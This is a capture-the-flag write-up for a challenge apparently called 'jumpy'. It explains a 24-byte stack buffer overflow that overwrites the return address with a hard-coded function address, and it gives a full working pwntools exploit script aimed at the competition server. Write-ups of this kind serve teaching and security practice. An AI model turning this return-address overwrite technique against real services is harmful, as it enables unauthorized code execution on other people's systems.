
This challenge had two parts: the first was overflowing the buffer, and the second was overwriting the return address with the address of winrar. Since there was no ASLR and we were given the binary, the address could be hard-coded.
The padding needed to fill the stack up to the return address was 24 bytes, so we sent 24 A's followed by the return address.
Exploit
from pwn import *
import time
# pwntools target configuration: 64-bit Linux.
context(arch='amd64', os='linux')
# NOTE(review): log_level is assigned a bool here; confirm this selects the intended verbosity.
context.log_level = True
# Local copy of the challenge binary; loaded here but not referenced elsewhere in this script.
binary = ELF('jumpy')
# Switch between the competition endpoint and a local instance.
competition = True
target = ("wcscctf.org", 8484) if competition else ('localhost', 1234)
conn = remote(*target)
def getInput():
    """Read one line from the connection and echo it to stdout."""
    line = conn.recvline()
    print(line)
def sendPayload():
    """Build the payload, save a copy to disk, send it, and print the two reply lines.

    The payload is 24 filler bytes followed by the 8-byte packed address
    0x400636 (32 bytes in total).
    """
    # No ASLR on the target, so the address is a fixed constant.
    ret_addr = p64(0x400636)
    padding = 'a' * 24
    buf = padding + ret_addr
    # Keep a copy on disk so the payload can be tested in gdb to check which registers it overwrites.
    with open('payload', 'w') as f:
        f.write(buf)
    conn.sendline(buf)
    # Give the service a moment before reading its response.
    time.sleep(1)
    first = conn.recvline()
    second = conn.recvline()
    print(first + second)
if __name__ == "__main__":
    # Consume one line from the service first, then deliver the payload.
    for step in (getInput, sendPayload):
        step()